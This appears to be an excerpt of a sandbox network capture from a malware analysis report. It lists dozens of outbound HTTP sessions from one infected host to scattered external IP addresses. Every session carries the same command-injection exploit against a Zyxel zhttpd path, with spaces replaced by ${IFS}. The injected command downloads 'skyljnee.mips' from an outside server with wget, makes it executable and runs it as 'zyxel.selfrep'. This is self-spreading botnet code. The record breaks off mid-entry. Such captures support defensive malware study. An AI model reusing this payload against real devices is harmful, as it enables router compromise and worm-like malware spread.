                                                        567192.168.2.145704087.243.144.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095748901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        568192.168.2.1435658192.115.136.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095778942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        569192.168.2.145152278.144.178.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095828056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        570192.168.2.144979877.77.224.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095856905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        571192.168.2.1454814128.165.176.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095876932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        572192.168.2.145397864.70.224.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095935106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        573192.168.2.1459724112.69.199.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095971107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        574192.168.2.143939891.81.149.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096025944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        575192.168.2.1452800207.171.42.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096034050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        576192.168.2.1448454138.211.58.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096091986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        577192.168.2.143380484.87.17.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096155882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        578192.168.2.1448550107.221.238.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096174955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        579192.168.2.144959483.34.22.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096231937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        580192.168.2.144009494.8.93.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096259117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        581192.168.2.1437726185.185.191.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096282959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        582192.168.2.1438326151.93.1.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096299887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        583192.168.2.145090079.23.58.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096365929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        584192.168.2.1460532105.69.208.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096381903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        585192.168.2.145794420.122.142.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096406937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        586192.168.2.143936499.177.120.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096445084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        587192.168.2.1449540210.79.134.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096494913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        588192.168.2.145452894.42.107.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096519947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        589192.168.2.1446016110.148.105.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096554995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        590192.168.2.145802470.188.198.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096575022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        591192.168.2.1450080223.74.226.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096632957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        592192.168.2.1445408155.160.247.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096678019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        593192.168.2.1439780216.38.70.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096710920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        594192.168.2.1432812216.246.88.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096735001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        595192.168.2.1459530174.58.30.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096774101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        596192.168.2.14539528.92.143.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096796036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        597192.168.2.1453216107.143.252.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096837044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        598192.168.2.144114290.98.234.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096880913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        599192.168.2.144240893.40.36.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096906900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        600192.168.2.145280827.76.135.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096951962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        601192.168.2.144167668.105.216.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.096968889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        602192.168.2.14485249.230.187.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097014904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        603192.168.2.145454048.91.49.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097052097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        604192.168.2.145465213.107.93.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097080946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        605192.168.2.1457672181.222.167.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097120047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        606192.168.2.1453668102.115.59.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097177029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        607192.168.2.144093473.119.15.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097213030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        608192.168.2.144597287.4.53.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097264051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        609192.168.2.1446380105.123.229.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097281933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        610192.168.2.143781424.13.68.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097326040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        611192.168.2.14361065.33.20.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097367048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        612192.168.2.145777489.85.1.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097415924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        613192.168.2.144541276.120.137.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097454071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        614192.168.2.1452334137.80.53.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097474098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        615192.168.2.1439978200.241.90.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097517967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        616192.168.2.1433194118.104.72.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097559929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        617192.168.2.1458332146.145.81.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097606897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        618192.168.2.143702635.209.223.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097661018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        619192.168.2.145018297.122.204.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097668886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        620192.168.2.1457824158.132.179.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097703934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        621192.168.2.1435514159.254.253.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097718000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        622192.168.2.1434234192.235.195.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097760916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        623192.168.2.1438028203.128.252.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097799063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        624192.168.2.1443926136.210.60.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097842932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        625192.168.2.143338882.5.173.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097866058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        626192.168.2.145322651.168.250.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097913980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        627192.168.2.1445260198.245.249.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.097935915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        628192.168.2.1454822131.137.69.100443
                                                        TimestampBytes transferredDirectionData
